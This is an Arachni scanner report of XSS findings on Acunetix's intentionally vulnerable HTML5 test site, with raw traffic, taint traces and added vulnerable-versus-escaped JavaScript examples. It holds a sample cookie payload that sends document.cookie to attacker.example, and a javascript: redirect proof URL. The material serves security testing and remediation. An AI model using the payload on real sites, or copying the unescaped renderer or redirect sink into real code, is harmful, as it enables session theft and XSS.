Client-side scripts are used extensively by modern web applications. They perform everything from simple functions (such as the formatting of text) up to full manipulation of client-side data and operating system interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) can be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute in an unsafe way.
Arachni has discovered that by modifying the affected DOM source, it is possible to insert and execute JavaScript code.

| Vector type | Input name | HTTP method | Action |
|---|---|---|---|
| link_dom | url | GET | http://testhtml5.vulnweb.com/ |
Client-side scripts are used extensively by modern web applications. They perform everything from simple functions (such as the formatting of text) up to full manipulation of client-side data and operating system interaction.
Cross-Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application takes untrusted data (in this example, from the client) and reuses it without performing any validation or sanitisation.
If the injected script is returned immediately, this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to insert script content directly into HTML element content.

| Vector type | Input name | HTTP method | Action |
|---|---|---|---|
| cookie | username | GET | http://testhtml5.vulnweb.com/logout |
| cookie | username | GET | http://testhtml5.vulnweb.com/ |
| link | id | GET | http://testhtml5.vulnweb.com/report |
| link | id | GET | http://testhtml5.vulnweb.com/like |
| link | id | GET | http://testhtml5.vulnweb.com/comment |
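The cookie rows in the table above are the reflected case: the `username` cookie is rendered straight into the page's "Welcome" banner (the raw response later in this report shows `Welcome <b>admin</b>` for `Cookie: username=admin`). The following is an added example, not the site's code: a minimal server-side renderer that reproduces that banner first without and then with output escaping for the HTML text context. The cookie parser, the escape routine and the sample cookie are constructed for the demo; the markup is copied from the banner in the response.

```javascript
// Added example: reflected XSS through a cookie value, and its fix.
// The server-side rendering functions are illustrative, not the site's code;
// the banner markup is taken from the scanned page's response.

// Parse a raw Cookie request header into a name -> value map.
function parseCookieHeader(header) {
  const cookies = {};
  for (const part of (header || '').split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    const value = part.slice(idx + 1).trim(); // keep any '=' inside the value
    if (name) cookies[name] = value;
  }
  return cookies;
}

// Escape for an HTML text or quoted-attribute context. These five characters
// are the ones that can terminate element content or a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the cookie value is concatenated into markup unchanged, so a
// value containing a tag is parsed as HTML by every browser that sends it.
function renderWelcomeVulnerable(cookieHeader) {
  const username = parseCookieHeader(cookieHeader).username || '';
  return `<p class="navbar-text pull-right">Welcome <b>${username}</b> | <a href='/logout'>Logout</a></p>`;
}

// Fixed: the same markup, with the untrusted value escaped for its context.
// The page author's HTML stays HTML; the cookie's content becomes text only.
function renderWelcomeSafe(cookieHeader) {
  const username = parseCookieHeader(cookieHeader).username || '';
  return `<p class="navbar-text pull-right">Welcome <b>${escapeHtml(username)}</b> | <a href='/logout'>Logout</a></p>`;
}

// Test oracle for the demo only (not a sanitiser): is there a raw <script tag?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample: a cookie value carrying a script. Cookie-borne XSS is
// reachable when the attacker can set the cookie, e.g. through another flaw
// or a sibling host allowed to set cookies for the parent domain; once set,
// the payload is replayed on every page load.
const SAMPLE_COOKIE =
  'username=<script>location="https://attacker.example/?c="+document.cookie</script>';
```

Escaping is context-specific: the routine above is correct for element content and quoted attribute values, but a value placed inside a `<script>` block or a URL needs the encoding appropriate to that context instead.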
Client-side scripts are used extensively by modern web applications. They perform everything from simple functions (such as the formatting of text) up to full manipulation of client-side data and operating system interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) can be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute in an unsafe way.
Arachni has discovered that by inserting an HTML element into the page's DOM inputs (sources), it was possible to have the HTML element rendered as part of the page by the sink.

| Vector type | Input name | HTTP method | Action |
|---|---|---|---|
| cookie_dom | username | GET | http://testhtml5.vulnweb.com/ |
Client-side scripts are used extensively by modern web applications. They perform everything from simple functions (such as the formatting of text) up to full manipulation of client-side data and operating system interaction.
Cross-Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application takes untrusted data (in this example, from the client) and reuses it without performing any validation or sanitisation.
If the injected script is returned immediately, this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to force the page to execute custom JavaScript code.

| Vector type | Input name | HTTP method | Action |
|---|---|---|---|
| cookie | username | GET | http://testhtml5.vulnweb.com/ |
> XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. (OWASP)
xss, xss_dom, xss_dom_script_context, xss_event, xss_path, xss_script_context, xss_tag
| Plugin | Options |
|---|---|
| autothrottle | {} |
| discovery | {} |
| healthmap | {} |
| timing_attacks | {} |
| uniformity | {} |
"parameter_values"
|
true
|
|---|---|
"exclude_vector_patterns"
|
[]
|
"include_vector_patterns"
|
[]
|
"link_templates"
|
[]
|
"links"
|
true
|
"forms"
|
true
|
"cookies"
|
true
|
"jsons"
|
true
|
"xmls"
|
true
|
"ui_forms"
|
true
|
"ui_inputs"
|
true
|
"local_storage"
|
{}
|
|---|---|
"wait_for_elements"
|
{}
|
"pool_size"
|
6
|
"job_timeout"
|
25
|
"worker_time_to_live"
|
100
|
"ignore_images"
|
false
|
"screen_width"
|
1600
|
"screen_height"
|
1200
|
"report_path"
|
nil
|
|---|---|
"token"
|
"b6dd40ef18c8c0e60e516f82ddccd137"
|
"user_agent"
|
"Arachni/v1.4"
|
|---|---|
"request_timeout"
|
10000
|
"request_redirect_limit"
|
5
|
"request_concurrency"
|
20
|
"request_queue_size"
|
100
|
"request_headers"
|
{}
|
"response_max_size"
|
500000
|
"cookies"
|
{}
|
"authentication_type"
|
"auto"
|
"values"
|
|
||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
"default_values"
|
|
||||||||||||||||||||
"without_defaults"
|
true
|
||||||||||||||||||||
"force"
|
false
|
"redundant_path_patterns"
|
{}
|
|---|---|
"dom_depth_limit"
|
5
|
"exclude_file_extensions"
|
[]
|
"exclude_path_patterns"
|
[]
|
"exclude_content_patterns"
|
[]
|
"include_path_patterns"
|
[]
|
"restrict_paths"
|
[]
|
"extend_paths"
|
[]
|
"url_rewrites"
|
{}
|
At the time these issues were logged there were no abnormal interferences or anomalous server behavior. These issues are considered trusted and accurate.
Client-side scripts are used extensively by modern web applications. They perform everything from simple functions (such as the formatting of text) up to full manipulation of client-side data and operating system interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) can be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute in an unsafe way.
Arachni has discovered that by modifying the affected DOM source, it is possible to insert and execute JavaScript code.
Client-side document rewriting, redirection, or other sensitive actions driven by untrusted data should be avoided wherever possible, as that data may never pass through server-side filtering.
To remedy DOM XSS vulnerabilities where such sensitive document actions must be used, it is essential to build dynamic interfaces with DOM construction methods such as document.createElement, element.setAttribute and element.appendChild, as opposed to HTML rendering methods such as document.write, document.writeln, element.innerHTML or element.outerHTML.
The affected vector is the link_dom input `url`, submitted using GET at http://testhtml5.vulnweb.com/ and pointing to http://testhtml5.vulnweb.com/.
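The source/sink description and the remediation above map directly onto this finding: the source is `window.location.hash`, and the browser-evaluated body later in this report shows the sink, a `#/redir?url=` handler that does `window.location = decodeURIComponent(...)` on whatever follows `?url=`, so a `javascript:` URL runs in the page's origin. The following is an added example, not the site's code: the page's extraction logic reproduced as a pure function beside a hardened version that parses the candidate with the URL parser and only follows http(s) destinations on an explicit allow-list. `pageOrigin`, `allowedOrigins` and the allow-list contents are assumptions standing in for `window.location.origin` and the site's own policy; the proof URL is the one in the report.

```javascript
// Added example: the #/redir?url= sink from the scanned page, and a hardened
// replacement. Written as pure functions so it runs outside a browser; in the
// page, `hash` is window.location.hash and the sink is `window.location = ...`.

// Vulnerable extraction, as the page does it: everything after "?url=" in the
// fragment is percent-decoded and handed to the navigation sink unchecked.
// Assigning a javascript: URL to window.location executes it in-page.
function extractRedirUrlVulnerable(hash) {
  return decodeURIComponent(hash.slice(hash.indexOf('?url=') + 5));
}

// Hardened: resolve the candidate against the page origin with the URL parser,
// allow only http(s) schemes, and only origins on an explicit allow-list.
// Anything else (javascript:, data:, vbscript:, protocol-relative links to
// foreign hosts, malformed percent-encoding) yields null, i.e. no redirect.
// `pageOrigin` is an assumed parameter standing in for window.location.origin.
function safeRedirectTarget(hash, pageOrigin, allowedOrigins) {
  const marker = hash.indexOf('?url=');
  if (marker < 0) return null;
  let candidate;
  try {
    candidate = decodeURIComponent(hash.slice(marker + 5));
  } catch (e) {
    return null; // malformed percent-encoding throws URIError
  }
  let target;
  try {
    target = new URL(candidate, pageOrigin); // relative paths resolve to our own origin
  } catch (e) {
    return null; // unparsable input
  }
  // The parser lower-cases the scheme and strips leading whitespace, so
  // " JaVaScRiPt:" style evasions land here too.
  if (target.protocol !== 'http:' && target.protocol !== 'https:') return null;
  // Open-redirect guard: only follow links to origins we explicitly trust.
  if (!allowedOrigins.includes(target.origin)) return null;
  return target.href;
}

// Scanner proof URL from this report, fragment only, as the browser exposes it.
const PROOF_HASH =
  '#/redir?url=javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()%2F%2F';
const PAGE_ORIGIN = 'http://testhtml5.vulnweb.com';
// Constructed allow-list for the demo: the site itself plus twitter.com, which
// the page's own redir links point at.
const ALLOWED_ORIGINS = [PAGE_ORIGIN, 'https://twitter.com'];
```

Note that the allow-list is what turns this from an XSS fix into an open-redirect fix as well: restricting the scheme alone stops script execution but still lets an attacker bounce users to an arbitrary host.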
```html
<a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872">
  <div class="detailsboxTitle ng-binding">
    Senator Brad Hoylman
  </div>
</a>
```
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
| link_dom | | http://testhtml5.vulnweb.com/ | http://testhtml5.vulnweb.com/ | |

http://testhtml5.vulnweb.com/#/redir?url=javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()%2F%2F
Transitions describe the steps required to restore the state of the page to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
| 6 | 5.859242 | load | page | |
Data-flow sinks track the flow of the injected taint through key points in the JavaScript environment of the page. Each sink is a function which was passed tainted arguments.
Taint is:
"window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"

| # | Object | Function |
|---|---|---|
| 0 | HTMLDocumentPrototype | write() |
| 1 | HTMLDocumentPrototype | write() |
| 2 | Window | decodeURIComponent() |
| 3 | Window | encodeURIComponent() |
| 4 | Window | decodeURIComponent() |
Execution-flow sinks log the successful execution of an injected JavaScript payload within the page's JavaScript environment. Each sink is a point of payload execution.

| # | Data |
|---|---|
| 0 | No helper data logged. |
Raw HTTP request used to retrieve the page.

```http
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: username=admin
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
```
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 07:00:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b>admin</b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="-718801808"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript 
--> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> Welcome <b>admin</b> | <a href="/logout" data-arachni-id="-2013462102">Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"xss_dom_0c25785427908905790d3a663dc49fa7":{"stop_at_first":false,"trace":true}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <title class="ng-scope">Loading ...</title> <script class="ng-scope"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); var redirUrl = decodeURIComponent(window.location.hash.slice(window.location.hash.indexOf("?url=")+5)); if (redirUrl) window.location = redirUrl; </script> <script type="text/javascript" class="ng-scope">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">admin is coming from <b>unknown</b> and has visited this page <b>2</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 
2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 
_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript 